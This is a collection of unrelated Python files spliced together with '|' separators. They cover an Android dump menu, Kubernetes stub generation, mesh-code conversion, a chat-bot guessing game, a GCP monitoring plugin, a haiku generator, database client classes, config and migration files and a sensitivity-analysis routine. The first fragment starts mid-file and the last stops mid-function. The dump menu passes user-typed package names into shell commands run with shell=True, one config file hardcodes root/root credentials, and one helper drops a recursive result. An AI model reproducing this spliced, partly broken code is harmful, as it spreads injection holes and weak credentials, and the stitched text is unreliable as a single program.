piey = subprocess.Popen(sysdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print("Sistem Bilgileri Başarılı Bir Şekilde Aktarıldı.")
elif numara == "8":
print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...")
piey = subprocess.Popen(packetdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print("Packed Bilgileri Başarılı Bir Şekilde Aktarıldı.")
elif numara == "9":
print("Aktarım Uzun Sürecektir Lütfen Bekleyiniz...")
piey = subprocess.Popen(memdump, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print("Memori Bilgileri Başarılı Bir Şekilde Aktarıldı.")
elif numara == "10":
packet_ismi = input("Lütfen Packet İsmini Yazınız Örnk(com.whatsapp)" + "?\n")
dtyy=memdumpdetayli+" "+packet_ismi+" > memdetayliinfo.txt"
piey = subprocess.Popen(dtyy, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = piey.communicate()
gelenveri = piey.communicate()
print("Memori Bilgileri Başarılı Bir Şekilde Aktarıldı.")
|
"""Collection of code generation utils."""
import os
import shutil
from pathlib import Path
from typing import Union
from black import WriteBack, format_file_in_place
from black.mode import Mode
from git import RemoteProgress, Repo
from mypy.stubgen import generate_stubs, parse_options
PROJECT_DIRECTORY = Path(__file__).parent.parent
def format_codegen(dst_dir: Union[str, Path], line_length: int = 180) -> None:
"""Format target files using black."""
mode = Mode(
line_length=line_length,
)
if isinstance(dst_dir, Path):
dst_dir = dst_dir.absolute().as_posix()
for dirpath, _, filenames in os.walk(dst_dir):
for fn in filenames:
format_file_in_place(Path(dirpath, fn), True, mode, WriteBack.YES)
def comment_codegen(dst_dir: Union[str, Path], name: str) -> None:
"""Prepend codegen comment to al files in a directory."""
if isinstance(dst_dir, Path):
dst_dir = dst_dir.absolute().as_posix()
for dirpath, _, filenames in os.walk(dst_dir):
for fn in filenames:
with open(os.path.join(dirpath, fn), "r") as original:
file_content = original.read()
with open(os.path.join(dirpath, fn), "w") as modified:
modified.write("# Code generated by `{0}`. DO NOT EDIT.\n".format(name) + file_content)
def clone_and_generate(clone_dir: Path, package_dir: Path, dst_dir: Path, branch: str) -> None:
"""Clone source repo and generate stubs for package.
:param Path clone_dir: Where to clone source repo
:param Path package_dir: Path to module that needs stubs generated
:param Path dst_dir: Destination path for stubs
:param str branch: Which branch to clone
"""
if clone_dir.exists():
shutil.rmtree(clone_dir)
clone_dir.mkdir(exist_ok=True, parents=False)
repo = Repo.clone_from(
"https://github.com/kubernetes-client/python.git",
clone_dir,
progress=RemoteProgress(),
branch=branch,
depth=1,
)
for submodule in repo.submodules:
submodule.update(init=True)
stubgen_options = parse_options(
[
"{0}".format(package_dir),
"-o={0}".format(dst_dir),
],
)
generate_stubs(stubgen_options)
comment_codegen(dst_dir, "stubgen")
|
"""
メッシュコード処理モジュール
"""
from math import floor
from typing import Tuple
def get_meshcode(lat: float, lon: float) -> str:
"""経度・緯度からメッシュコード(1 次、2 次、3 次)を取得
Args:
lat(float): 緯度(10 進数)
lon(float): 経度(10 進数)
Returns:
str: 1 次メッシュコード(4 桁), 2 次メッシュコード(2 桁), 3 次メッシュコード(2 桁) 計8桁
"""
lt = lat * 3.0 / 2.0
lg = lon
y1 = floor(lt)
x1 = floor(lg)
lt = (lt - y1) * 8.0
lg = (lg - x1) * 8.0
y2 = floor(lt)
x2 = floor(lg)
lt = (lt - y2) * 10.0
lg = (lg - x2) * 10.0
y3 = floor(lt)
x3 = floor(lg)
code1 = 0
code1 += int(y1) % 100 * 100
code1 += int(x1) % 100 * 1
code2 = 0
code2 += int(y2) * 10
code2 += int(x2) * 1
code3 = 0
code3 += int(y3) * 10
code3 += int(x3) * 1
return str(code1 * 10000 + code2 * 100 + code3)
def get_mesh_latlon(meshcode: str) -> Tuple[float, float]:
"""メッシュコードから経度緯度への変換
Args:
meshcode(str): メッシュコード
Returns:
Tuple[float, float]: 緯度(10 進数), 経度(10 進数)
"""
# メッシュコードから緯度経度を計算(中心ではなく南西方向の座標が得られる)
y1 = int(meshcode[:2])
x1 = int(meshcode[2:4])
y2 = int(meshcode[4])
x2 = int(meshcode[5])
y3 = int(meshcode[6])
x3 = int(meshcode[7])
# 南西方向の座標からメッシュ中心の緯度を算出
lat = ((y1 * 80 + y2 * 10 + y3) * 30 / 3600) + 15 / 3600
# 南西方向の座標からメッシュ中心の経度を算出
lon = (((x1 * 80 + x2 * 10 + x3) * 45 / 3600) + 100) + 22.5 / 3600
return lat, lon
|
from matrix_bot.mbot.plugins import Plugin, civility
import random
class GuessNumberPlugin(Plugin):
"""Play a guess the number game.
You have to guess what the number is in a certain number of attempts. You
will be told information such as higher/lower than the guessed number.
guessnumber new : Starts a new game.
guessnumber hint : Get a hint for the number. Consumes an attempt.
guessnumber guess <number> : Guess the number. Consumes an attempt.
"""
name = "guessnumber"
MAX_NUM = 100
ATTEMPTS = 5
def __init__(self, *args, **kwargs):
super(Plugin, self).__init__(*args, **kwargs)
self.games = {}
@civility
def cmd_new(self, event):
"""Start a new game. 'guessnumber new'"""
usr = event["sender"]
game_state = {
"num": random.randint(0, GuessNumberPlugin.MAX_NUM),
"attempts": 0
}
self.games[usr] = game_state
return (
self.tr.trans(
"Created a new game."
"Guess what the chosen number is between 0-%s. You have %s attempts."
) % (GuessNumberPlugin.MAX_NUM, GuessNumberPlugin.ATTEMPTS)
)
@civility
def cmd_guess(self, event, num):
"""Make a guess. 'guessnumber guess <number>'"""
usr = event["sender"]
if usr not in self.games:
return self.tr.trans("You need to start a game first.")
int_num = -1
try:
int_num = int(num)
except:
return self.tr.trans("That isn't a number.")
target_num = self.games[usr]["num"]
if int_num == target_num:
self.games.pop(usr)
return self.tr.trans("You win!")
game_over = self._add_attempt(usr)
if game_over:
return game_over
else:
sign = self.tr.trans("greater") \
if (target_num > int_num) else self.tr.trans("less")
return self.tr.trans("Nope. The number is %s than that.") % sign
@civility
def cmd_hint(self, event):
"""Get a hint. 'guessnumber hint'"""
# hints give a 50% reduction, e.g. between 0-50, even/odd, ends with 12345
usr = event["sender"]
if usr not in self.games:
return self.tr.trans("You need to start a game first.")
num = self.games[usr]["num"]
hint_pool = [self._odd_even, self._ends_with, self._between]
hint_func = hint_pool[random.randint(1, len(hint_pool)) - 1]
game_over = self._add_attempt(usr)
if game_over:
return game_over
return hint_func(num)
def _add_attempt(self, usr):
self.games[usr]["attempts"] += 1
if self.games[usr]["attempts"] >= GuessNumberPlugin.ATTEMPTS:
res = self.tr.trans(
"Out of tries. The number was %s."
) % self.games[usr]["num"]
self.games.pop(usr)
return res
def _between(self, num):
half = GuessNumberPlugin.MAX_NUM / 2
if num < half:
return "The number is less than %s." % half
else:
return "The number is %s or greater." % half
def _ends_with(self, num):
actual = num % 10
if actual < 5:
return self.tr.trans("The last digit is either 0, 1, 2, 3, 4.")
else:
return self.tr.trans("The last digit is either 5, 6, 7, 8, 9.")
def _odd_even(self, num):
if num % 2 == 0:
return self.tr.trans("The number is even.")
else:
return self.tr.trans("The number is odd.")
|
import datetime
import glob
import json
import logging
import os
import re
from ruxit.api.base_plugin import RemoteBasePlugin
from googleapiclient.discovery import build
from google.oauth2 import service_account
COMPUTE_METRICS = [
'compute.googleapis.com/instance/cpu/utilization',
'compute.googleapis.com/instance/disk/read_bytes_count',
'compute.googleapis.com/instance/disk/read_ops_count',
'compute.googleapis.com/instance/disk/write_bytes_count',
'compute.googleapis.com/instance/disk/write_ops_count',
'compute.googleapis.com/instance/network/received_bytes_count',
'compute.googleapis.com/instance/network/received_packets_count',
'compute.googleapis.com/instance/network/sent_bytes_count',
'compute.googleapis.com/instance/network/sent_packets_count',
'compute.googleapis.com/instance/uptime'
]
#class RemoteGCPPlugin():
class RemoteGCPPlugin(RemoteBasePlugin):
logger = logging.getLogger(__name__)
def initialize(self, **kwargs):
self.debug = False
self.project_jwt = kwargs['config']['project_jwt']
# json.loads encapsulates keys and value in ' - the google library needs it encapsulated in "
self.project_jwt = str(self.project_jwt).replace('{\'', '{"')
self.project_jwt = str(self.project_jwt).replace('\': \'', '": "')
self.project_jwt = str(self.project_jwt).replace('\', \'', '", "')
self.project_jwt = str(self.project_jwt).replace('\'}', '"}')
if 'debug' in kwargs:
self.debug = True
return
def log(self, message):
if self.debug:
print(message)
else:
self.logger.info(__name__ + ": " + message)
@staticmethod
def format_rfc3339(datetime_instance):
return datetime_instance.isoformat("T") + "Z"
def get_start_time(self):
start_time = (datetime.datetime.utcnow() -
datetime.timedelta(minutes=5))
return self.format_rfc3339(start_time)
def get_end_time(self):
end_time = datetime.datetime.utcnow() - datetime.timedelta(minutes=0)
return self.format_rfc3339(end_time)
def build_requests(self, client, project_id):
requests = []
project_resource = "projects/{}".format(project_id)
for metric in COMPUTE_METRICS:
request = client.projects().timeSeries().list(
name=project_resource,
filter='metric.type="{}"'.format(metric),
interval_startTime=self.get_start_time(),
interval_endTime=self.get_end_time())
requests.append(request)
return requests
@staticmethod
def execute_requests(requests):
responses = []
for request in requests:
response = request.execute()
responses.append(response)
return responses
@staticmethod
def get_or_create_instance(instances, instance_name):
for instance in instances:
if instance['instance_name'] == instance_name:
return instance
instance = {'instance_name': instance_name}
instances.append(instance)
return instance
def process_response(self, instances, response):
# check if there was a data point in the given time frame
if 'timeSeries' in response:
for time_series in response['timeSeries']:
instance_name = time_series['metric']['labels']['instance_name']
instance = self.get_or_create_instance(instances, instance_name)
instance['instance_id'] = time_series['resource']['labels']['instance_id']
instance['zone'] = time_series['resource']['labels']['zone']
if not 'metrics' in instance:
instance['metrics'] = {}
# replace '/' with '-' because the remote plugin doesn't allow metrics with '/' in the name
metric_name = str(time_series['metric']['type']).replace('/', '-')
metric_value_type = str(time_series['valueType']).lower() + "Value"
# TODO: instead of taking first value, calculate avg of returned metric points (sliding average)
# TODO: review statistical background and recommendation
metric_value = time_series['points'][0]['value'][metric_value_type]
metric_timestamp = time_series['points'][0]['interval']['endTime']
instance['metrics'][metric_name] = {}
instance['metrics'][metric_name]['valueType'] = metric_value_type
instance['metrics'][metric_name]['value'] = metric_value
instance['metrics'][metric_name]['timestamp'] = metric_timestamp
def get_instances(self, project_jwt):
instances = []
project_id = project_jwt["project_id"]
self.log("Processing '{}'".format(project_id))
#credentials = service_account.Credentials.from_service_account_file(project_jwt)
credentials = service_account.Credentials.from_service_account_info(project_jwt)
client = build('monitoring', 'v3', credentials=credentials)
requests = self.build_requests(client, project_id)
responses = self.execute_requests(requests)
for response in responses:
self.process_response(instances, response)
return instances
def get_instance_details(self, list_of_instances, project_jwt):
self.log("Getting instance details")
credentials = service_account.Credentials.from_service_account_info(project_jwt)
compute = build('compute', 'v1', credentials=credentials)
project_id = project_jwt["project_id"]
for instance in list_of_instances:
zone = instance['zone']
instance_name = instance['instance_name']
request = compute.instances().get(project=project_id, zone=zone, instance=instance_name)
instance_details = request.execute()
instance['properties'] = {}
instance['properties']['creation_timestamp'] = instance_details['creationTimestamp']
instance['properties']['description'] = instance_details['description']
instance['properties']['machineType'] = instance_details['machineType']
instance['properties']['status'] = instance_details['status']
instance['properties']['cpuPlatform'] = instance_details['cpuPlatform']
instance['properties']['link'] = instance_details['selfLink']
nic_counter = 0
for instance_nic in instance_details['networkInterfaces']:
key = 'nic_' + str(nic_counter) + '_name'
instance['properties'][key] = instance_nic['name']
key = 'nic_' + str(nic_counter) + '_ip'
instance['properties'][key] = instance_nic['networkIP']
access_config_counter = 0
for accessConfig in instance_nic['accessConfigs']:
key = 'nic_' + str(nic_counter) + '_accessConfig_' + str(access_config_counter) + '_ip'
instance['properties'][key] = accessConfig['natIP']
access_config_counter = access_config_counter + 1
nic_counter = nic_counter + 1
return list_of_instances
def create_group(self, group_id, group_name, project_id):
extended_group_id = group_id + "_" + project_id
extended_group_name = group_name + " (" + project_id + ")"
self.log("- group id='{}', name='{}'".format(extended_group_id, extended_group_name))
if self.debug:
group = None
else:
group = self.topology_builder.create_group(extended_group_id, extended_group_name)
return group
def report_metrics(self, group, list_of_instances):
for instance in list_of_instances:
self.log("--- element '{}', '{}'".format(instance['instance_id'], instance['instance_name']))
if not self.debug:
element = group.create_element(instance['instance_id'], instance['instance_name'])
for key,value in instance['properties'].items():
self.log("---- element_property {}={}".format(key, value))
# consider endpoints to add to element
containsIpAddress = re.match(".*_ip$", key)
if containsIpAddress:
self.log("---- endpoint {}".format(value))
if not self.debug:
element.add_endpoint(value, 0)
if not self.debug:
element.report_property(key, value)
for key, value in instance['metrics'].items():
self.log("----- absolute {}={}".format(key, value['value']))
if not self.debug:
element.absolute(key=key, value=value['value'])
def query(self, **kwargs):
project_jwt_json = json.loads(self.project_jwt)
list_of_instances = self.get_instances(project_jwt_json)
list_of_instances = self.get_instance_details(list_of_instances, project_jwt_json)
group = self.create_group("ComputeEngine", "Compute Engine", project_jwt_json["project_id"])
self.report_metrics(group, list_of_instances)
#class Test:
# @staticmethod
# def test():
# plugin = RemoteGCPPlugin()
#
# with open('gcp-project.json') as project_jwt_json:
# project_jwt = json.load(project_jwt_json)
# kwargs = {'debug': True, 'config': { 'project_jwt' : str(project_jwt)}}
#
# plugin.initialize(**kwargs)
# plugin.query()
#
#if __name__ == "__main__":
# Test.test()
|
"""Produce new haiku from training corpus of existing haiku."""
import sys
import logging
import random
import json
from collections import defaultdict
from generate_corpus_missing_words.count_syllables import count_syllables
from string import punctuation
logging.disable(logging.CRITICAL) # comment-out to enable debugging messages
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
def load_corpus():
"""Load the corpus as a string."""
with open('generate_corpus_missing_words/corpus.json') as f_obj:
corpus = json.load(f_obj)
return corpus
def map_word_to_word(corpus):
"""Load list & use dictionary to map word to word that follows."""
limit = len(corpus)-1
dict1_to_1 = defaultdict(list)
for index, word in enumerate(corpus):
if index < limit:
suffix = corpus[index + 1]
dict1_to_1[word].append(suffix)
logging.debug("map_word_to_word results for \"sake\" = %s\n",
dict1_to_1['sake'])
return dict1_to_1
def map_2_words_to_word(corpus):
"""Load list & use dictionary to map word-pair to trailing word."""
limit = len(corpus)-2
dict2_to_1 = defaultdict(list)
for index, word in enumerate(corpus):
if index < limit:
key = word + ' ' + corpus[index + 1]
suffix = corpus[index + 2]
dict2_to_1[key].append(suffix)
logging.debug("map_2_words_to_word results for \"sake jug\" = %s\n",
dict2_to_1['sake jug'])
return dict2_to_1
def random_word(corpus):
"""Return random word and syllable count from training corpus."""
word = random.choice(corpus)
num_syls = count_syllables(word)
if num_syls > 4:
random_word(corpus)
else:
logging.debug("random word & syllables = %s %s\n", word, num_syls)
return (word, num_syls)
def word_after_single(prefix, suffix_map_1, current_syls, target_syls):
"""Return all acceptable words in a corpus that follow a single word."""
accepted_words = []
suffixes = suffix_map_1.get(prefix)
if suffixes is not None:
for candidate in suffixes:
num_syls = count_syllables(candidate)
if current_syls + num_syls <= target_syls:
accepted_words.append(candidate)
logging.debug("accepted words after \"%s\" = %s\n",
prefix, set(accepted_words))
return accepted_words
def word_after_double(prefix, suffix_map_2, current_syls, target_syls):
"""Return all acceptable words in a corpus that follow a word pair."""
accepted_words = []
suffixes = suffix_map_2.get(prefix)
if suffixes is not None:
for candidate in suffixes:
num_syls = count_syllables(candidate)
if current_syls + num_syls <= target_syls:
accepted_words.append(candidate)
logging.debug("accepted words after \"%s\" = %s\n",
prefix, set(accepted_words))
return accepted_words
def haiku_line(suffix_map_1, suffix_map_2, corpus, end_prev_line, target_syls):
"""Build a haiku line from a training corpus and return it."""
line = '2/3'
line_syls = 0
current_line = []
if len(end_prev_line) == 0: # build first line
line = '1'
word, num_syls = random_word(corpus)
current_line.append(word)
line_syls += num_syls
word_choices = word_after_single(word, suffix_map_1,
line_syls, target_syls)
while len(word_choices) == 0:
prefix = random.choice(corpus)
logging.debug("new random prefix = %s", prefix)
word_choices = word_after_single(prefix, suffix_map_1,
line_syls, target_syls)
word = random.choice(word_choices)
num_syls = count_syllables(word)
logging.debug("word & syllables = %s %s", word, num_syls)
line_syls += num_syls
current_line.append(word)
if line_syls == target_syls:
end_prev_line.extend(current_line[-2:])
return current_line, end_prev_line
else: # build lines 2 & 3
current_line.extend(end_prev_line)
while True:
logging.debug("line = %s\n", line)
prefix = current_line[-2] + ' ' + current_line[-1]
word_choices = word_after_double(prefix, suffix_map_2,
line_syls, target_syls)
while len(word_choices) == 0:
index = random.randint(0, len(corpus) - 2)
prefix = corpus[index] + ' ' + corpus[index + 1]
logging.debug("new random prefix = %s", prefix)
word_choices = word_after_double(prefix, suffix_map_2,
line_syls, target_syls)
word = random.choice(word_choices)
num_syls = count_syllables(word)
logging.debug("word & syllables = %s %s", word, num_syls)
if line_syls + num_syls > target_syls:
continue
elif line_syls + num_syls < target_syls:
current_line.append(word)
line_syls += num_syls
elif line_syls + num_syls == target_syls:
current_line.append(word)
break
end_prev_line = []
end_prev_line.extend(current_line[-2:])
if line == '1':
final_line = current_line[:]
else:
final_line = current_line[2:]
return final_line, end_prev_line
def main():
"""Give user choice of building a haiku or modifying an existing haiku."""
intro = """\n
A thousand monkeys at a thousand typewriters...
or one computer...can sometimes produce a haiku.\n"""
print("{}".format(intro))
corpus = load_corpus()
suffix_map_1 = map_word_to_word(corpus)
suffix_map_2 = map_2_words_to_word(corpus)
final = []
choice = None
while choice != "0":
print(
"""
Japanese Haiku Generator
0 - Quit
1 - Generate a Haiku poem
2 - Regenerate Line 2
3 - Regenerate Line 3
"""
)
choice = input("Choice: ")
print()
# exit
if choice == "0":
print("Sayonara.")
sys.exit()
# generate a full haiku
elif choice == "1":
final = []
end_prev_line = []
first_line, end_prev_line1 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line, 5)
final.append(first_line)
line, end_prev_line2 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line1, 7)
final.append(line)
line, end_prev_line3 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line2, 5)
final.append(line)
# regenerate line 2
elif choice == "2":
if not final:
print("Please generate a full haiku first (Option 1).")
continue
else:
line, end_prev_line2 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line1, 7)
final[1] = line
# regenerate line 3
elif choice == "3":
if not final:
print("Please generate a full haiku first (Option 1).")
continue
else:
line, end_prev_line3 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line2, 5)
final[2] = line
# some unknown choice
else:
print("\nSorry, but that isn't a valid choice.", file=sys.stderr)
continue
# display results
print()
print("First line = " + ' '.join(final[0]), file=sys.stderr)
print("Second line = " + ' '.join(final[1]), file=sys.stderr)
print("Third line = " + ' '.join(final[2]), file=sys.stderr)
print()
input("\n\nPress the Enter key to exit.")
if __name__ == '__main__':
main()
|
"""A pub/sub Bus for managing states and transitions.
The 'process' subpackage defines a ProcessBus object, which is used to
connect applications, servers, and frameworks with site-wide services
such as daemonization, process reload, signal handling, drop privileges,
PID file management, logging for all of these, and many more.
The 'plugins' subpackage defines a few abstract and concrete services for
use with a Bus. Some use custom channels; see the documentation for each class.
"""
from magicbus.base import ChannelFailures
try:
from magicbus.win32 import Win32Bus as Bus, Win32ProcessBus as ProcessBus
except ImportError:
from magicbus.base import Bus
from magicbus.process import ProcessBus
bus = ProcessBus()
__all__ = ['ChannelFailures', 'Bus', 'ProcessBus', 'bus']
|
#
# Copyright (C) 2021 Vaticle
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from abc import ABC
from typing import TYPE_CHECKING, Union
import typedb_protocol.common.transaction_pb2 as transaction_proto
from typedb.api.concept.type.type import Type, RemoteType
from typedb.common.exception import TypeDBClientException, MISSING_LABEL, MISSING_TRANSACTION
from typedb.common.label import Label
from typedb.common.rpc.request_builder import type_set_label_req, type_is_abstract_req, type_get_supertype_req, \
type_get_supertypes_req, type_get_subtypes_req, type_delete_req
from typedb.concept.concept import _Concept, _RemoteConcept
from typedb.concept.proto import concept_proto_reader
if TYPE_CHECKING:
from typedb.api.connection.transaction import TypeDBTransaction, _TypeDBTransactionExtended
class _Type(Type, _Concept, ABC):
def __init__(self, label: Label, is_root: bool):
if not label:
raise TypeDBClientException.of(MISSING_LABEL)
self._label = label
self._is_root = is_root
self._hash = hash(label)
def get_label(self):
return self._label
def is_root(self):
return self._is_root
def as_type(self) -> "Type":
return self
def __str__(self):
return type(self).__name__ + "[label: %s]" % self.get_label()
def __eq__(self, other):
if other is self:
return True
if not other or type(self) != type(other):
return False
return self.get_label() == other.get_label()
def __hash__(self):
return self._hash
class _RemoteType(RemoteType, _RemoteConcept, ABC):
def __init__(self, transaction: Union["_TypeDBTransactionExtended", "TypeDBTransaction"], label: Label, is_root: bool):
if not transaction:
raise TypeDBClientException.of(MISSING_TRANSACTION)
if not label:
raise TypeDBClientException.of(MISSING_LABEL)
self._transaction_ext = transaction
self._label = label
self._is_root = is_root
self._hash = hash((self._transaction_ext, label))
def get_label(self):
return self._label
def is_root(self):
return self._is_root
def as_type(self) -> "RemoteType":
return self
def set_label(self, new_label: str):
self.execute(type_set_label_req(self.get_label(), new_label))
self._label = new_label
self._hash = hash((self._transaction_ext, new_label))
def is_abstract(self):
return self.execute(type_is_abstract_req(self.get_label())).type_is_abstract_res.abstract
def get_supertype(self):
res = self.execute(type_get_supertype_req(self.get_label())).type_get_supertype_res
return concept_proto_reader.type_(res.type) if res.WhichOneof("res") == "type" else None
def get_supertypes(self):
return (concept_proto_reader.type_(t) for rp in self.stream(type_get_supertypes_req(self.get_label())) for t in rp.type_get_supertypes_res_part.types)
def get_subtypes(self):
return (concept_proto_reader.type_(t) for rp in self.stream(type_get_subtypes_req(self.get_label())) for t in rp.type_get_subtypes_res_part.types)
def delete(self):
self.execute(type_delete_req(self.get_label()))
def execute(self, request: transaction_proto.Transaction.Req):
return self._transaction_ext.execute(request).type_res
def stream(self, request: transaction_proto.Transaction.Req):
return (rp.type_res_part for rp in self._transaction_ext.stream(request))
def __str__(self):
return type(self).__name__ + "[label: %s]" % self.get_label()
def __eq__(self, other):
if other is self:
return True
if not other or type(self) != type(other):
return False
return self._transaction_ext is other._transaction_ext and self.get_label() == other.get_label()
def __hash__(self):
return self._hash
|
#!/usr/bin/env python3
# coding: utf8
# Author: Lenz Furrer, 2017
'''
Loaders and formatters for the BeCalm TIPS formats.
'''
import json
import codecs
import logging
from urllib import request as url_request
from .document import Article, Section
from .load import DocIterator
from .export import StreamFormatter
# ======== #
# Loaders. #
# ======== #
class _BeCalmFetcher(DocIterator):
'''
Fetch documents from BeCalm's servers.
'''
domain = None
url = None
textfield = None
def iter_documents(self, source):
'''
Iterate over documents from a BeCalm server.
'''
return self._iter_documents(source)
def _iter_documents(self, docids):
if not isinstance(docids, (tuple, list)):
docids = list(docids)
if not docids:
raise ValueError('Empty doc-ID list.')
query = json.dumps({self.domain: docids}).encode('ascii')
headers = {'Content-Type': 'application/json'}
logging.info("POST request to BeCalm's server with the query %s", query)
req = url_request.Request(self.url, data=query, headers=headers)
with url_request.urlopen(req) as f:
docs = json.load(codecs.getreader('utf-8')(f))
for doc in docs:
yield self._document(doc)
def _document(self, doc):
id_ = doc['externalId']
title = doc['title']
text = doc[self.textfield]
article = Article(id_, tokenizer=self.config.text_processor)
article.add_section('Title', title)
article.add_section('Abstract', text)
return article
class BeCalmAbstractFetcher(_BeCalmFetcher):
'''
Fetch abstracts from BeCalm's abstract server.
'''
domain = 'abstracts'
url = 'http://193.147.85.10:8088/abstractserver/json'
textfield = 'text'
class BeCalmPatentFetcher(_BeCalmFetcher):
'''
Fetch patent abstracts from BeCalm's patent server.
'''
domain = 'patents'
url = 'http://193.147.85.10:8087/patentserver/json'
textfield = 'abstractText'
# =========== #
# Formatters. #
# =========== #
class _BeCalmFormatter(StreamFormatter):
'''
Common basis for BeCalm's specific output formats.
'''
fields = ('document_id', 'section', 'init', 'end', 'score',
'annotated_text', 'type', 'database_id')
@staticmethod
def _iter_entries(content):
'''
Iterate over entries needed for BeCalm's output formats.
'''
for section in content.get_subelements(Section):
article_id = section.article.id_
section_type = 'T' if section.type_.lower() == 'title' else 'A'
for entity in section.iter_entities():
yield (
article_id,
section_type,
entity.start,
entity.end,
0.5, # dummy score
entity.text,
entity.type,
entity.cid,
)
class BeCalmTSVFormatter(_BeCalmFormatter):
'''
BeCalm's TSV format for the TIPS challenge.
'''
ext = 'tsv'
template = '{}\t{}\t{}\t{}\t{}\t{}\t{}\n'
def write(self, stream, content):
if self.config.p.include_header:
stream.write(self.template.format(*(f.upper()
for f in self.fields)))
for entry in self._iter_entries(content):
stream.write(self.template.format(*entry))
class BeCalmJSONFormatter(_BeCalmFormatter):
'''
BeCalm's JSON format for the TIPS challenge.
'''
ext = 'json'
def write(self, stream, content):
stream.write('[\n')
need_comma = False # comma needed before all but the first entry
for entry in self._iter_entries(content):
if need_comma:
stream.write(',\n')
else:
need_comma = True
json.dump(dict(zip(self.fields, entry)), stream, indent=4)
stream.write('\n]')
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
把一些人去操作的时候不会关心的配置参数定义在这里。
而如IP、用户名、密码等属性,人工操作也需要的,则通过函数接口传入
"""
#NIM
NIM_prompt='#'
NIM_port=23
#VIO
#each VIOServer config should be the same
VIOServer_prompt='$'
VIOServer_port=23
#HMC
HMC_prompt='hscroot@localhost:~>'
HMC_port=22
#AIX Common
AIX_TelnetPort=23
AIX_Cmd_prompt='#'
AIX_Default_Username='root'
AIX_Default_Passwd='root'
|
# Generated by Django 3.1.11 on 2021-07-20 08:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schools', '0006_auto_20210713_1029'),
]
operations = [
migrations.AlterField(
model_name='school',
name='zip_city',
field=models.CharField(blank=True, max_length=15),
),
]
|
import time
import os
# from lucent.optvis.objectives import channel
from lucent.optvis.render import render_vis, tensor_to_img_array
import numpy as np
from PIL import Image
import streamlit as st
import torch
from lucent.interface.utils import join_layer_channel, update_image_db, display_image, init, create_model_list
def update_identifier():
st.session_state.identifier = join_layer_channel(st.session_state.layer, st.session_state.channel)
if 'layer_names' not in st.session_state:
st.session_state['layer_names'] = []
with st.sidebar:
with st.form('config'):
st.write('## Config')
st.selectbox(
'Model',
options=create_model_list(),
key='model_name',
index=0,
)
st.text_input('Data directory', value='/home/aric/Pictures/', key='datadir')
st.checkbox('Load images from data dir', value=True, key='load_data')
submitted = st.form_submit_button("Save config")
if submitted:
print(f'\n{st.session_state.layer = }, {st.session_state.channel = }\n')
st.session_state.model = init(st.session_state.model_name)
st.write('Config saved!')
# this should have a disabled keyword but somehow doesn't yet --> maybe code on github needs to be pushed to package manager first
st.checkbox("Save images to data dir (won't work if loading images)", value=False, key='save_data')
st.selectbox('layer', options=st.session_state.layer_names, key='layer', on_change=update_identifier, index=0)
st.text_input('channel', value='1', key='channel', on_change=update_identifier)
# init and update data base of features
if 'database' not in st.session_state:
st.session_state['database'] = dict()
# init identifier
if 'identifier' not in st.session_state:
st.session_state['identifier'] = None
if 'model' not in st.session_state:
st.session_state['model'] = None
if 'layer' not in st.session_state:
st.session_state['layer'] = None
if st.session_state.load_data:
update_image_db(st.session_state.datadir, st.session_state.model_name)
st.button('Generate/Load image', on_click=display_image, args=(st.session_state.model, st.session_state.identifier,))
|
from __future__ import division
from __future__ import print_function
from scipy.stats import norm
import numpy as np
from . import common_args
from ..util import read_param_file
def analyze(problem, X, Y, num_resamples=1000,
conf_level=0.95, print_to_console=False):
"""Calculates Derivative-based Global Sensitivity Measure on model outputs.
Returns a dictionary with keys 'vi', 'vi_std', 'dgsm', and 'dgsm_conf',
where each entry is a list of size D (the number of parameters) containing
the indices in the same order as the parameter file.
Parameters
----------
problem : dict
The problem definition
X : numpy.matrix
The NumPy matrix containing the model inputs
Y : numpy.array
The NumPy array containing the model outputs
num_resamples : int
The number of resamples used to compute the confidence
intervals (default 1000)
conf_level : float
The confidence interval level (default 0.95)
print_to_console : bool
Print results directly to console (default False)
References
----------
.. [1] Sobol, I. M. and S. Kucherenko (2009). "Derivative based global
sensitivity measures and their link with global sensitivity
indices." Mathematics and Computers in Simulation, 79(10):3009-3017,
doi:10.1016/j.matcom.2009.01.023.
"""
D = problem['num_vars']
if Y.size % (D + 1) == 0:
N = int(Y.size / (D + 1))
else:
raise RuntimeError("Incorrect number of samples in model output file.")
if not 0 < conf_level < 1:
raise RuntimeError("Confidence level must be between 0-1.")
base = np.zeros(N)
X_base = np.zeros((N, D))
perturbed = np.zeros((N, D))
X_perturbed = np.zeros((N, D))
step = D + 1
base = Y[0:Y.size:step]
X_base = X[0:Y.size:step, :]
for j in range(D):
perturbed[:, j] = Y[(j + 1):Y.size:step]
X_perturbed[:, j] = X[(j + 1):Y.size:step, j]
# First order (+conf.) and Total order (+conf.)
keys = ('vi', 'vi_std', 'dgsm', 'dgsm_conf')
S = dict((k, np.zeros(D)) for k in keys)
if print_to_console:
print("Parameter %s %s %s %s" % keys)
for j in range(D):
S['vi'][j], S['vi_std'][j] = calc_vi(
base, perturbed[:, j], X_perturbed[:, j] - X_base[:, j])
